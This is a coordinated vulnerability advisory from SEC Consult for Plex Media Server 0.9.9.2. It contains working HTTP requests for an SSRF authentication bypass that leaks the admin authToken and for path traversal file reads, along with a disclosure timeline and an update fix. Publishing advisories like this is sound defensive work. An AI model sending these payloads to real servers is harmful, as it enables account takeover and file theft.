title: Authentication bypass (SSRF) and local file disclosure
product: Plex Media Server
"Plex is a media player system consisting of a player application with a
10-foot user interface and an associated media server. It is available for
Mac OS X, Linux, and Microsoft Windows."
URL: https://en.wikipedia.org/wiki/Plex_(software)
By requesting content from 127.0.0.1 an attacker can bypass all authentication
and execute commands with administrative privileges.
Plex "Remote" servers (thousands of them can be found via Shodan and Google,
none of them were accessed) are affected by both vulnerabilities as well.
GET /system/proxy HTTP/1.1
Host: <PLEX_WAN_HOST>
X-Plex-Url: http://localhost:32400/myplex/account?IRRELEVANT=
X-Plex-Url: http://my.plexapp.com/
The last X-Plex-Url header value "http://my.plexapp.com/" is contained in
the whitelist (Regex) and passes validation. The request is then processed by
the actual request handler in the backend webserver (Python). Here both header
values are concatenated using a comma. This way the actual URL that is
requested is controlled by the first X-Plex-Url value.
By indicating a parameter (called IRRELEVANT) the second X-Plex-Url value is
dissolved.
This results in the following request (made by Plex Media Server):
GET /myplex/account?IRRELEVANT=,http://my.plexapp.com/ HTTP/1.1
Host: localhost:32400
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Connection: close
Accept: /
Accept-Encoding: gzip
The response for this request is passed to the attacker and includes the
authToken value ("master token"), which can be used to impersonate legitimate
Plex users. Of course other administrative actions can be performed as well.
<?xml version="1.0" encoding="UTF-8"?>
<MyPlex authToken="<REMOVED>" username="<REMOVED>" mappingState="mapped" mappingError="" mappingErrorMessage="1" signInState="ok" publicAddress="1" publicPort="9415" privateAddress="1" privatePort="32400" subscriptionFeatures="cloudsync,pass,sync" subscriptionActive="1" subscriptionState="Active">
</MyPlex>
A video demonstrating this issue has been released by SEC Consult:
http://www.youtube.com/watch?v=f99fm4QU9u8
GET /manage/…\…\…\…\…\…\…\…\…\…\secret.txt HTTP/1.1
Host: <HOST>
GET /web/…\…\…\…\…\…\…\…\…\…\secret.txt HTTP/1.1
Host: <HOST>
GET /:/resources/…\…\…\…\…\…\…\…\…\…\secret.txt HTTP/1.1
Host: <HOST>
The /manage/ and /web/ handlers can be exploited without prior authentication.
This vulnerability was confirmed on Windows.
The vulnerabilities have been verified to exist in Plex Media Server version
0.9.9.2.374-aa23a69.
2014-02-09: Contacting vendor through [email protected] and requesting
encryption keys.
2014-02-10: Vendor provides encryption keys.
2014-02-10: Sending advisory and proof of concept exploit.
2014-02-10: Vendor acknowledges receipt of advisory.
2014-02-17: Requesting status update.
2014-02-17: Vendor provides release timeline.
2014-02-20: Vendor releases fixed version (0.9.9.3).
2014-02-21: Requesting clarification regarding fixed version.
2014-02-21: Vendors provides further information about fixed version and
other reported vulnerabilities.
2014-02-28: SEC Consult releases coordinated security advisory.
Update to a more recent version of Plex Media Server (eg. 0.9.9.5).
No workaround available.
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested in working with the experts of SEC Consult?
Write to [email protected]
EOF Stefan Viehbock / @2014